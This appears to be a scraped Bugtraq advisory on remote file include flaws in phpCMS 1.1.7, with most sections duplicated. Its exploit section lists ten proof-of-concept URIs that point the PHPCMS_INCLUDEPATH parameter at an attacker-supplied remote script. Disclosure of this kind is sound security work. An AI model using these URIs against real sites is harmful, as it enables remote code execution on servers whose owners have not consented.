PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
BID:21768
CVE-2006-3019 |Info
PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 21768 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2006 12:00AM |
| Updated: | Jan 04 2007 06:21PM |
| Credit: | Federico Fazzi is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpCMS phpCMS 1.1.7 |
| Not Vulnerable: | |
Discussion
PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.1.7 and 1.2.1pl2 are vulnerable; other versions may also be affected.
phpCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions 1.1.7 and 1.2.1pl2 are vulnerable; other versions may also be affected.
Exploit / POC
PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH=[cmd_url]/
An attacker can exploit these issues via a web client.
The following proof-of-concept URIs are available:
http://www.example.com/[pc_path]/parser/include/class.parser_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.session_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.edit_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.http_indexer_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.cache_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.search_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.lib_indexer_universal_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/include/class.layout_phpcms.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/plugs/counter.php?PHPCMS_INCLUDEPATH=[cmd_url]
http://www.example.com/[pc_path]/parser/parser.php?PHPCMS_INCLUDEPATH=[cmd_url]/
Solution / Fix
PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHPCMS PHPCMS_IncludePath Parameter Multiple Remote File Include Vulnerabilities
References:
References:
- phpCMS Homepage (phpCMS)
- Re: phpcms <=- 1.1.7 Remote File Inclusion (Stuart Moore)
- phpcms <=- 1.1.7 Remote File Inclusion ([email protected])